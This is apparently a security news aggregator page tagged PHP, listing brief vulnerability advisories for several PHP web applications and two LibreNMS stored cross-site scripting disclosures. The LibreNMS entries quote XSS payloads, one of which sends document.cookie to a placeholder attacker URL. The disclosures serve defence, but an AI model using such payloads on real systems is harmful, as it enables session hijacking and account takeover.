Security
Headlines
HeadlinesLatestCVEs

Tag

#php

TitanNit Web Control 2.01 / Atemio 7600 Code Injection

TitanNit Web Control 2.01 and Atemio 7600 suffer from a PHP code injection vulnerability.

Packet Storm
#vulnerability#web#windows#php#auth#firefox
Teacher Subject Allocation Management System 1.0 Insecure Settings

Teacher Subject Allocation Management System version 1.0 suffers from an ignored default credential vulnerability.

Task Management System 1.0 Code Injection

Task Management System version 1.0 suffers from a PHP code injection vulnerability.

Supply Chain Management 1.0 Backup Disclosure

Supply Chain Management version 1.0 suffers from a backup disclosure vulnerability.

Event Management System 1.0 Insecure Direct Object Reference

Event Management System version 1.0 suffers from an insecure direct object reference vulnerability.

Student Attendance Management System 1.0 Insecure Settings

Student Attendance Management System version 1.0 suffers from an ignored default credential vulnerability.

Printing Business Records Management System 1.0 Cross Site Request Forgery

Printing Business Records Management System version 1.0 suffers from a cross site request forgery vulnerability.

Online Eyewear Shop 1.0 Cross Site Request Forgery

Online Eyewear Shop version 1.0 suffers from a cross site request forgery vulnerability.

GHSA-7f84-28qh-9486: LibreNMS has Stored Cross-site Scripting vulnerability in "Alert Transports" feature

### Summary A Stored Cross-Site Scripting (XSS) vulnerability in the "Alert Transports" feature allows authenticated users to inject arbitrary JavaScript through the "Details" section (which contains multiple fields depending on which transport is selected at that moment). This vulnerability can lead to the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and allowing unauthorized actions. ### Details The vulnerability occurs when creating an alert transport. The application does not properly sanitize the user input in the "Details" field, allowing an attacker to inject and store arbitrary JavaScript. This script is then executed in the context of the page whenever the alert transport is viewed or processed. For instance, the following payload can be used to trigger the XSS: ```test1<script>{onerror=alert}throw 1337</script>``` When the page containing the transport details is loaded, this payload causes the browser to exec...

GHSA-j2j9-7pr6-xqwv: LibreNMS has Stored Cross-site Scripting vulnerability in "Alert Rules" feature

### Summary A Stored Cross-Site Scripting (XSS) vulnerability in the "Alert Rules" feature allows authenticated users to inject arbitrary JavaScript through the "Title" field. This vulnerability can lead to the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and allowing unauthorized actions. ### Details The vulnerability occurs when creating an alert rule. The application does not properly sanitize user inputs in the "Title" field, which allows an attacker to escape the attribute context where the title is injected (data-content). Despite some character restrictions, the attacker can still inject a payload that leverages available attributes on the div element to execute JavaScript automatically when the page loads. For example, the following payload can be used: ```test1'' autofocus onfocus="document.location='https://<attacker-url>/logger.php?c='+document.cookie"``` This payload triggers the XSS when the affected page i...